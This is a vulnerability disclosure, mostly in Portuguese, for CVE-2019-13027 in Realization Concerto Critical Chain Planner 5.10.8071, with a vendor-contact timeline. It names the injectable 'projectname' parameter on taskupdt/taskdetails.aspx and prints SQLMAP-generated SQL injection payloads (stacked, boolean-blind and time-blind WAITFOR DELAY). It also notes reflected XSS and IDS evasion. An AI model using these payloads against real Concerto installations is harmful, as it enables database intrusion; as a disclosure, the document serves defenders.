
Details for disclosing CVE-2019-13027
Detalhes para divulgar a CVE-2019-13027
Linha do tempo do contato com o fornecedor: 1 de julho de 2019 -> Sem resposta, nenhum e-mail de volta.
4 de julho de 2019 -> Sem resposta, nenhum e-mail de volta.
8 de julho de 2019 -> E-mail enviado, Github criado.
11 de julho de 2019 -> Nenhuma resposta do fornecedor. Vulnerabilidade divulgada.
[Tipo de Vulnerabilidade] SQL Injection [Base de Código do Produto Afetado] CONCERTO CRITICAL CHAIN PLANNER (CCPM) - Versão: 5.10.8071 (Outras versões no branch 5.x provavelmente são afetadas. Não é possível testar com >outros branches)
[Componente Afetado] Realization Concerto Critical Chain Planner (também conhecido como CCPM) 5.10.8071 tem alguns problemas críticos de segurança, sendo Injeção de SQL em pelo menos na página web taskupdt/taskdetails.aspx através do parâmetro "projectname"
[Tipo de Ataque] Remoto
[Vetores de Ataque] A aplicação tem muitos XSS/CSRF refletidos (por exemplo, em checklist/checklist), mas a parte complicada são as Injeções de SQL. Alguma adulteração é necessária dependendo da versão do SQL Server e/ou IDS/IPS.
URL: https:/concertoURL/taskupdt/taskdetails.aspx?projectname=foo&taskID=1&uniqueTaskID=2&taskuniqueid=2&reportname=&securitycode=undefined&bIsSubTask=undefined
O ProjectName (foo) deve existir e ser válido. Fuzz os parâmetros restantes (ou use uma requisição real). foo também tem um XSS
SQL Detectado (payloads do SQLMAP) Parâmetro: projectname (GET)
Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: projectname=foo';WAITFOR DELAY '0:0:5'-- Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: projectname=foo' AND 3676=3676-- Type: time-based blind Title: Microsoft SQL Server/Sybase time-based blind (IF) Payload: projectname=foo' WAITFOR DELAY '0:0:5'--[Fornecedor do Produto] REALIZATION - https://www.realization.com/